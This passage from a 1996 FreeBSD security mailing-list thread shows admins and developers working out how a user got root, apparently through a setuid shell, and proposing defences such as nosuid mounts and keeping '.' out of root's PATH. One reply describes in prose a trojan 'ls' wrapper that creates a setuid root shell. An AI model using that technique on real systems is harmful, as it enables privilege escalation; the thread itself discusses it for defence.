strip the "setuid" bit automatically. > Otherwise, there's no point in the setuid mechanism as anyone could make > a setuid binary on their own system and just upload it to yours! Yeah, that's what I'm trying to figure out... Vince From owner-freebsd-security Tue Jun 25 02:39:15 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA07877 for security-outgoing; Tue, 25 Jun 1996 02:39:15 -0700 (PDT) Received: from solar.tlk.com (root@solar.tlk.com [194.97.84.34]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA07871 for ; Tue, 25 Jun 1996 02:39:04 -0700 (PDT) Received: by solar.tlk.com id ; Tue, 25 Jun 96 11:38 MET DST Message-Id: From: torstenb@solar.tlk.com (Torsten Blum) Subject: Re: I need help on this one - please help me track this guy down! To: mwhite+@CMU.EDU (Matthew Jason White) Date: Tue, 25 Jun 1996 11:38:51 +0200 (MET DST) Cc: freebsd-security@freebsd.org In-Reply-To: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu> from Matthew Jason White at "Jun 24, 96 08:04:05 pm" Reply-To: torstenb@tlk.com X-Mailer: ELM [version 2.4ME+ PL15 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Matthew Jason White wrote: > You probably want to change the security script so that it points out > ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any > other publicly writeable area. Are you running inn1.4 on this system? > If so, you should probably upgrade to inn-1.4uoff4 (this port should > prolly be upgraded, if someone hasn't already). inn runs as user `news', so you can never create a setuid root shell even if inn has a bug... -tb From owner-freebsd-security Tue Jun 25 02:43:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA08138 for security-outgoing; Tue, 25 Jun 1996 02:43:23 -0700 (PDT) Received: from solar.tlk.com (root@solar.tlk.com [194.97.84.34]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA08118 for ; Tue, 25 Jun 1996 02:43:17 -0700 (PDT) Received: by solar.tlk.com id ; Tue, 25 Jun 96 11:43 MET DST Message-Id: From: torstenb@solar.tlk.com (Torsten Blum) Subject: Re: I need help on this one - please help me track this guy down! To: gpalmer@freebsd.org (Gary Palmer) Date: Tue, 25 Jun 1996 11:40:15 +0200 (MET DST) In-Reply-To: <27780.835661925@palmer.demon.co.uk> from Gary Palmer at "Jun 25, 96 01:18:45 am" Reply-To: torstenb@tlk.com X-Mailer: ELM [version 2.4ME+ PL15 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Gary Palmer wrote: > [ CC: Trimmed ] > > > Yeah, that's the real question is like if he can transfer the > > binary from another machine and have it work... other people can do the > > same thing and gain access to FreeBSD boxes as root as long as they have > > a account on that machine... > > Sort of. You need root access in the first place to create a suid root > shell... It could be an old exploit that is now closed (like the > mount_union loophole)... Or the telnetd environment hole - it was possible to become root via telnet without an account on the target machine. -tb From owner-freebsd-security Tue Jun 25 03:05:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA09455 for security-outgoing; Tue, 25 Jun 1996 03:05:52 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA09440; Tue, 25 Jun 1996 03:05:23 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id MAA09345; Tue, 25 Jun 1996 12:02:23 +0200 (SAT) Message-Id: <199606251002.MAA09345@grumble.grondar.za> To: -Vince- cc: Don Yuniskis , mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 12:02:23 +0200 From: Mark Murray Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote: > On Tue, 25 Jun 1996, Don Yuniskis wrote: > > > Hmmm, that's only if we had phone support.... We don't :) but do > > > admins really go run a program that the user said won't run? > > > > Well, it *appears* that one of *you* did! :> > > Well, jbhunt was the one who gave the user the account and the > user just transferred the root which is /bin/sh with setuid and ran it > and he got root.... Review that. _Carefully_. I think you are seriously WRONG there. That user did something sneaky, and you did not see it. M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Tue Jun 25 03:24:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA10609 for security-outgoing; Tue, 25 Jun 1996 03:24:08 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA10393 for ; Tue, 25 Jun 1996 03:23:22 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id MAA09453; Tue, 25 Jun 1996 12:21:25 +0200 (SAT) Message-Id: <199606251021.MAA09453@grumble.grondar.za> To: -Vince- cc: Bradley Dunn , security@FreeBSD.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy Date: Tue, 25 Jun 1996 12:21:25 +0200 From: Mark Murray Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote: > > *Sigh*. This is turning into elementary sysadmin class. If you are > > going to admin a system with over 1000 users, you need to learn to > > think security issues through. If "." is in the path, the cracker can > > put a trojan horse in some directory where he *can* write, and he > > will name it something he hopes the unsuspecting admin will execute > > while root. > > Well, the problem here is one of the admins know the user and he > was watching him just run the program himself, the root user had nothing > to do with executing anything... ...in which case you were _really_ open. The user could do what he liked, right? He didn't have to trick you, he just did it - with root privelige. He just (ab)used your goodwill and naivete. When you let users type commands on your system, you are supposed to be alert :-) M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Tue Jun 25 03:43:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA13106 for security-outgoing; Tue, 25 Jun 1996 03:43:06 -0700 (PDT) Received: from mail.cs.tu-berlin.de (root@mail.cs.tu-berlin.de [130.149.17.13]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA13097 for ; Tue, 25 Jun 1996 03:43:01 -0700 (PDT) Received: from campa.panke.de (anonymous218.ppp.cs.tu-berlin.de [130.149.17.218]) by mail.cs.tu-berlin.de (8.6.12/8.6.12) with ESMTP id MAA26333; Tue, 25 Jun 1996 12:15:11 +0200 Received: (from wosch@localhost) by campa.panke.de (8.6.12/8.6.12) id MAA00691; Tue, 25 Jun 1996 12:01:29 +0200 Date: Tue, 25 Jun 1996 12:01:29 +0200 From: Wolfram Schneider Message-Id: <199606251001.MAA00691@campa.panke.de> To: Matthew Jason White Cc: security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu> References: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu> Reply-to: Wolfram Schneider MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Matthew Jason White writes: >You probably want to change the security script so that it points out >ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any If you have a separate partition for /usr/home, /tmp etc. use mount with option nosuid. Wolfram From owner-freebsd-security Tue Jun 25 04:11:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA15253 for security-outgoing; Tue, 25 Jun 1996 04:11:52 -0700 (PDT) Received: from seagull.rtd.com (root@seagull.rtd.com [198.102.68.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id EAA15248; Tue, 25 Jun 1996 04:11:50 -0700 (PDT) Received: (from dgy@localhost) by seagull.rtd.com (8.7.5/1.2) id EAA10554; Tue, 25 Jun 1996 04:05:40 -0700 (MST) From: Don Yuniskis Message-Id: <199606251105.EAA10554@seagull.rtd.com> Subject: Re: I need help on this one - please help me track this guy down! To: mark@grumble.grondar.za.@grondar.za (Mark Murray) Date: Tue, 25 Jun 1996 04:05:40 -0700 (MST) Cc: vince@mercury.gaianet.net, dgy@rtd.com, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: <199606251002.MAA09345@grumble.grondar.za> from "Mark Murray" at Jun 25, 96 12:02:23 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > > Well, it *appears* that one of *you* did! :> > > > > Well, jbhunt was the one who gave the user the account and the > > user just transferred the root which is /bin/sh with setuid and ran it > > and he got root.... > > Review that. _Carefully_. I think you are seriously WRONG there. That > user did something sneaky, and you did not see it. I STRONGLKY suggest "vince" repeat exactly what he's said here. When he realizes it's "just not so", perhaps he'll rethink his NEXT post. 1) As root, create *any* suid file. Heck, use this guy's "root" file just in case you can't do it yourself. 2) As non-root, try to make a copy of that file... use cp, cat >, ftp it, up/download it via kermit, etc. Let us know what you learn in the process! From owner-freebsd-security Tue Jun 25 05:07:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA20172 for security-outgoing; Tue, 25 Jun 1996 05:07:25 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id FAA20165; Tue, 25 Jun 1996 05:07:22 -0700 (PDT) Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id WAA00732; Tue, 25 Jun 1996 22:12:29 +0930 From: Michael Smith Message-Id: <199606251242.WAA00732@genesis.atrad.adelaide.edu.au> Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Tue, 25 Jun 1996 22:12:28 +0930 (CST) Cc: mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: from "-Vince-" at Jun 25, 96 01:40:18 am MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -Vince- stands accused of saying: > > Yeah, you have a point but jbhunt was watching the user as he > hacked root since he brought the file from his own machine.... so that > wasn't something the admin was tricked into doing.. ... so jbhunt should know exactly what he did. If they don't, then you should sack them presto. But I don't think you understand; you cannot _make_ a file owned by root unless you are _already_ root. > Vince -- ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ ]] Genesis Software genesis@atrad.adelaide.edu.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ ]] Collector of old Unix hardware. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Tue Jun 25 06:24:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA25216 for security-outgoing; Tue, 25 Jun 1996 06:24:23 -0700 (PDT) Received: from brasil.moneng.mei.com (brasil.moneng.mei.com [151.186.109.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA25211; Tue, 25 Jun 1996 06:24:21 -0700 (PDT) Received: (from jgreco@localhost) by brasil.moneng.mei.com (8.7.Beta.1/8.7.Beta.1) id IAA07541; Tue, 25 Jun 1996 08:23:11 -0500 From: Joe Greco Message-Id: <199606251323.IAA07541@brasil.moneng.mei.com> Subject: Re: I need help on this one - please help me track this guy down! To: davidg@root.com Date: Tue, 25 Jun 1996 08:23:11 -0500 (CDT) Cc: gpalmer@FreeBSD.ORG, vince@mercury.gaianet.net, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: <199606250714.AAA03862@root.com> from "David Greenman" at Jun 25, 96 00:14:37 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > >No, everyone does NOT have `.' in their paths! I most certainly don't, > >as I know that it's ALL to easy to have someone break your system > >security that way. Imagine if you are looking into something as root, > >and have `.' in your path. You go into someone elses directory, and do > >a `ls'. All they need is a wrapper program called `ls' in that dir > >which copies /bin/sh to some directory, chowns it to root, then sets > >the setuid bit, and THEN exec's ls with the arguments given, an BANG, > >there goes your system security. > > Actually, this particular problem can be avoided by putting "." last in > the search path rather than first. That's security via stupidity, it is about as much protection as a windshield made out of plastic wrap. Most sites do not have commands like "dir", "ren", etc. in /usr/bin or /usr/local/bin... (I do by the way), making it easier for an unsuspecting admin to screw themselves in this way. My .cshrc, ancient but venerable... [...] set path=( /bin /usr/{bin,local/bin,ucb,games} /etc ) [...] if ( -r ~/.path ) then if ( $root ) then set path=(`grep -v "\." < ~/.path`) else set path=(`cat ~/.path`) endif endif [...] I for one am more comfortable having to prefix stuff with ./ if I really want it to do what I mean. ... Joe ------------------------------------------------------------------------------- Joe Greco - Systems Administrator jgreco@ns.sol.net Solaria Public Access UNIX - Milwaukee, WI 414/546-7968 From owner-freebsd-security Tue Jun 25 07:41:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA02344 for security-outgoing; Tue, 25 Jun 1996 07:41:12 -0700 (PDT) Received: from horst.bfd.com (horst.bfd.com [204.160.242.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA02325; Tue, 25 Jun 1996 07:41:08 -0700 (PDT) Received: from harlie.bfd.com (bastion.bfd.com [204.160.242.2]) by horst.bfd.com (8.7.5/8.7.3) with SMTP id HAA18264; Tue, 25 Jun 1996 07:40:38 -0700 (PDT) Date: Tue, 25 Jun 1996 07:40:34 -0700 (PDT) From: "Eric J. Schwertfeger" To: -Vince- cc: Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, -Vince- wrote: > Yeah, you have a point but jbhunt was watching the user as he > hacked root since he brought the file from his own machine.... so that > wasn't something the admin was tricked into doing.. Then the important question is, how did he move the file so that it retained the setuid bit? We're already pretty sure that the program is only /bin/sh with the setuid bit turned on. So either he found a way to move the file with the bit turned on, or he found a way to turn it on, which reqires root access. From owner-freebsd-security Tue Jun 25 08:08:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA05769 for security-outgoing; Tue, 25 Jun 1996 08:08:09 -0700 (PDT) Received: from eldorado.net-tel.co.uk (eldorado.net-tel.co.uk [193.122.171.253]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA05673 for ; Tue, 25 Jun 1996 08:07:50 -0700 (PDT) From: Andrew.Gordon@net-tel.co.uk Received: (from root@localhost) by eldorado.net-tel.co.uk (8.6.12/8.6.10) id QAA13643 for security@freebsd.org; Tue, 25 Jun 1996 16:07:06 +0100 Received: from "/PRMD=NET-TEL/ADMD=GOLD 400/C=GB/" by net-tel.co.uk (Route400-RFCGate); Tue, 25 Jun 96 16:02:11 +0100 X400-Received: by mta "eldorado" in "/PRMD=net-tel/ADMD=gold 400/C=gb/"; Relayed; Tue, 25 Jun 96 16:02:11 +0100 X400-Received: by mta "net-tel cambridge" in "/PRMD=net-tel/ADMD=gold 400/C=gb/"; Relayed; Tue, 25 Jun 96 15:02:09 +0000 X400-Received: by "/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"; Relayed; Tue, 25 Jun 96 15:02:08 +0000 X400-MTS-Identifier: ["/PRMD=NET-TEL/ADMD=Gold 400/C=GB/";hst:17886-960625150208-0ED7] X400-Content-Type: P2-1984 (2) X400-Originator: Andrew.Gordon@net-tel.co.uk Original-Encoded-Information-Types: IA5-Text X400-Recipients: security@freebsd.org Date: Tue, 25 Jun 96 15:02:08 +0000 X400-Content-Identifier: Re(2): I need he Message-Id: <"811-960625150230-D047*/G=Andrew/S=Gordon/O=NET-TEL Computer Systems Ltd/PRMD=NET-TEL/ADMD=Gold 400/C=GB/"@MHS> To: list:; Cc: security@freebsd.org In-Reply-To: <199606251242.WAA00732@genesis.atrad.adelaide.edu.au> Subject: Re(2): I need help on this one - please help me track this guy down! Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > -Vince- stands accused of saying: > > > > Yeah, you have a point but jbhunt was watching the user as he > > hacked root since he brought the file from his own machine.... so that > > wasn't something the admin was tricked into doing.. But what file transfer mechanism was used? NFS maybe? Certainly a simple NFS mount of an untrusted machine is a dangerous thing to do, since setuids on those files will be obeyed. Maybe you allow this via an incautious AMD map? Personally, I like to mount all NFS filesystems "nosuid" - and likewise for all local systems exported by NFS (I don't normally export / or /usr). Most users have no business creating setuid programs in their filespace, and such a policy would most likely have prevented this breach even if the setuid binary was created by some other means. From owner-freebsd-security Tue Jun 25 08:16:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA07528 for security-outgoing; Tue, 25 Jun 1996 08:16:59 -0700 (PDT) Received: from maki.wwa.com (maki.wwa.com [198.49.174.21]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA07519 for ; Tue, 25 Jun 1996 08:16:53 -0700 (PDT) Received: from wendigo.trans.sni-usa.com by maki.wwa.com with smtp (Smail3.1.29.1 #1) id m0uYZrI-000rPHC; Tue, 25 Jun 96 10:16 CDT Received: from vogon.trans.sni-usa.com (vogon [136.157.83.215]) by wendigo.trans.sni-usa.com (8.7.5/8.6.12) with ESMTP id KAA10515 for ; Tue, 25 Jun 1996 10:12:14 -0500 (CDT) Received: from shyam.trans.sni-usa.com (shyam.trans.sni-usa.com [136.157.82.43]) by vogon.trans.sni-usa.com (8.6.12/8.6.12) with SMTP id KAA05415 for ; Tue, 25 Jun 1996 10:24:38 -0500 From: hal@snitt.com (Hal Snyder) To: security@freebsd.org Subject: The Vinnie Loophole Date: Tue, 25 Jun 1996 15:17:47 GMT Organization: Siemens Nixdorf Transportation Technologies Message-ID: <31cffc6e.1096226166@vogon.trans.sni-usa.com> X-Mailer: Forte Agent .99e/32.227 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Re: Trojan horse programs that get executed because "." is in PATH somewhere: The fact that this well-known, easily plugged loophole is being rediscovered by new admins (probably daily) suggests that we *could* do something more proactive to keep it from happening. 1. How about adding checks for "." or equivalent in $PATH to /etc/security? Scan for it in .profile, .bashrc, and so forth. This would not catch every offence but would help. 2. At appropriate securelevel, have exec() fail with explanation to syslog if there is no "/" in argv[0]. How much code would [should] this break? Is this a horrible idea? From owner-freebsd-security Tue Jun 25 08:38:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA09235 for security-outgoing; Tue, 25 Jun 1996 08:38:45 -0700 (PDT) Received: from root.com (implode.root.com [198.145.90.17]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA09225 for ; Tue, 25 Jun 1996 08:38:39 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by root.com (8.7.5/8.6.5) with SMTP id IAA19357; Tue, 25 Jun 1996 08:38:30 -0700 (PDT) Message-Id: <199606251538.IAA19357@root.com> X-Authentication-Warning: implode.root.com: Host localhost [127.0.0.1] didn't use HELO protocol To: hal@snitt.com (Hal Snyder) cc: security@freebsd.org Subject: Re: The Vinnie Loophole In-reply-to: Your message of "Tue, 25 Jun 1996 15:17:47 GMT." <31cffc6e.1096226166@vogon.trans.sni-usa.com> From: David Greenman Reply-To: davidg@root.com Date: Tue, 25 Jun 1996 08:38:29 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >Re: Trojan horse programs that get executed because "." is in PATH >somewhere: > >The fact that this well-known, easily plugged loophole is being >rediscovered by new admins (probably daily) suggests that we *could* >do something more proactive to keep it from happening. > >1. How about adding checks for "." or equivalent in $PATH to >/etc/security? Scan for it in .profile, .bashrc, and so forth. This >would not catch every offence but would help. > >2. At appropriate securelevel, have exec() fail with explanation to >syslog if there is no "/" in argv[0]. How much code would [should] >this break? Is this a horrible idea? It's appropriate for some environments and not for others. I certainly wouldn't want the kernel involved in this in any case, and things that do scans through your filesystems need to be carefully controlled. Some systems have so much disk space and NFS that the scan wouldn't complete within the 24 hour time period. Something like (1), if implemented, should not be enabled by default. -DG David Greenman Core-team/Principal Architect, The FreeBSD Project From owner-freebsd-security Tue Jun 25 08:44:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA09942 for security-outgoing; Tue, 25 Jun 1996 08:44:16 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA09904; Tue, 25 Jun 1996 08:44:04 -0700 (PDT) Received: (from jbhunt@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id IAA05830; Tue, 25 Jun 1996 08:43:37 -0700 (PDT) Date: Tue, 25 Jun 1996 08:43:37 -0700 (PDT) From: jbhunt To: Michael Smith cc: -Vince- , mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606251242.WAA00732@genesis.atrad.adelaide.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Michael Smith wrote: > -Vince- stands accused of saying: > > > > Yeah, you have a point but jbhunt was watching the user as he > > hacked root since he brought the file from his own machine.... so that > > wasn't something the admin was tricked into doing.. > > ... so jbhunt should know exactly what he did. If they don't, then > you should sack them presto. > > But I don't think you understand; you cannot _make_ a file owned by > root unless you are _already_ root. > > > Vince > > -- > ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ > ]] Genesis Software genesis@atrad.adelaide.edu.au [[ > ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ > ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ > ]] Collector of old Unix hardware. "Where are your PEZ?" The Tick [[ > Ok, this is jb. First off all this copied from here to their as root didn't happen. I gave this fella an account knowing more than likely if we had a hole he would find it. Unfortunately I wasn't watching his tty when he actually used whatever exploit he used. He obviously used a setuid exploit so I suggest that there is a New exploit out abusing a setuid program somewhere on the system because I know vince fixed the mount_union and current fixed the old ypwhich hack. Or actually maybe not so old for some of you, but either way I did have to give him an account before he could do anything. However, once inside it took him 2 minutes and he was root. I know for a fact it was his FIRST look inside the system and I ran no scripts from his dir. That option is out so don't bother. I did start watching his tty after he took root but it was too late. I am open to any suggestions any of you have so far this seems to be a very constructive group :> John SysAdmin Gaianet From owner-freebsd-security Tue Jun 25 08:57:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA11276 for security-outgoing; Tue, 25 Jun 1996 08:57:27 -0700 (PDT) Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA10991; Tue, 25 Jun 1996 08:54:14 -0700 (PDT) Received: (from narvi@localhost) by haldjas.folklore.ee (8.6.12/8.6.12) id SAA04118; Tue, 25 Jun 1996 18:56:45 +0300 Date: Tue, 25 Jun 1996 18:56:44 +0300 (EET DST) From: Narvi To: "Eric J. Schwertfeger" cc: -Vince- , Mark Murray , hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote: > > > On Tue, 25 Jun 1996, -Vince- wrote: > > > Yeah, you have a point but jbhunt was watching the user as he > > hacked root since he brought the file from his own machine.... so that > > wasn't something the admin was tricked into doing.. > > Then the important question is, how did he move the file so that it > retained the setuid bit? We're already pretty sure that the program is > only /bin/sh with the setuid bit turned on. So either he found a way to > move the file with the bit turned on, or he found a way to turn it on, > which reqires root access. How did he get the file there in the first place? Via ftp? Or did he just copy it over? Ftp seems to remove even the exec bit, let alone the setuid. Could there be a way of attack via a modified ftp server? Sander > > From owner-freebsd-security Tue Jun 25 09:16:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA13109 for security-outgoing; Tue, 25 Jun 1996 09:16:36 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA12991 for ; Tue, 25 Jun 1996 09:15:36 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id SAA10099; Tue, 25 Jun 1996 18:13:07 +0200 (SAT) Message-Id: <199606251613.SAA10099@grumble.grondar.za> To: jbhunt cc: Michael Smith , -Vince- , mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 18:13:06 +0200 From: Mark Murray Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk [hackers removed from cc: - the crosspost is getting a bit much there] jbhunt wrote: > Ok, this is jb. First off all this copied from here to their as root > didn't happen. I gave this fella an account knowing more than likely if > we had a hole he would find it. Unfortunately I wasn't watching his tty > when he actually used whatever exploit he used. Ok... > He obviously used a > setuid exploit so I suggest that there is a New exploit out abusing a > setuid program somewhere on the system because I know vince fixed the > mount_union and current fixed the old ypwhich hack. Not so fast. You didn't see what he did, but you are claiming suid. maybe, maybe not. You don't _know_. > Or actually maybe not > so old for some of you, but either way I did have to give him an account > before he could do anything. However, once inside it took him 2 minutes > and he was root. I know for a fact it was his FIRST look inside the > system and I ran no scripts from his dir. How do you know? If "." is in your path, you run a script from wherever you are - /tmp, /var/tmp, /var/mail if you have made that world writable etc. What other world writable directories do you have? what runs out of cron? What is automatically executed when you run emacs? vi? what is your EDITOR setting for vipw? Do you read your daily security report? Create a new suid file and see if it is reoported the next day. > That option is out so don't > bother. I did start watching his tty after he took root but it was too > late. I am open to any suggestions any of you have so far this seems to > be a very constructive group :> The most constructive suggestion at the moment is to look for your own mistakes, and be more open to them. So far it seems you (collectively) have made lots, but aren't admitting this - even to yourselves. Ask him what he did - maybe he'll even tell you? :-) If it is a FreeBSD security hole, We'll all thank him and you for finding it :-). M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Tue Jun 25 09:26:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA13935 for security-outgoing; Tue, 25 Jun 1996 09:26:46 -0700 (PDT) Received: from husky.cslab.vt.edu (jaitken@husky.cslab.vt.edu [198.82.184.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id JAA13925 for ; Tue, 25 Jun 1996 09:26:43 -0700 (PDT) Received: (jaitken@localhost) by husky.cslab.vt.edu (8.6.12/8.6.4) id MAA06583; Tue, 25 Jun 1996 12:26:17 -0400 From: Jeff Aitken Message-Id: <199606251626.MAA06583@husky.cslab.vt.edu> Subject: Re: Re(2): I need help on this one - please help me track this guy down! To: Andrew.Gordon@net-tel.co.uk Date: Tue, 25 Jun 1996 12:26:17 -0400 (EDT) Cc: security@freebsd.org In-Reply-To: <"811-960625150230-D047*/G=Andrew/S=Gordon/O=NET-TEL Computer from "Andrew.Gordon@net-tel.co.uk" at Jun 25, 96 03:02:08 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > But what file transfer mechanism was used? NFS maybe? > > Personally, I like to mount all NFS filesystems "nosuid" - and likewise > for all local systems exported by NFS (I don't normally export / or > /usr). Most users have no business creating setuid programs in their > filespace, and such a policy would most likely have prevented this > breach even if the setuid binary was created by some other means. One thing you can do to help with this sort of problem is to map UID 0 to some other UID. In our lab, we've got an AlphaStation which exports several filesystems via NFS. On a few administrative-type machines, we map UID 0 to UID 0 (so that root on any of the administrative machines can alter files as needed) but on the client machines (i.e., those machines used primarily by lab patrons) UID 0 is mapped to 'nobody' or somesuch. Furthermore, only system administrators have accounts on the servers; thus, even if someone breaks root on a client machine in the lab, they can't install any sort of backdoor on the server. If/when such a compromise is detected, we simply reinstall the OS 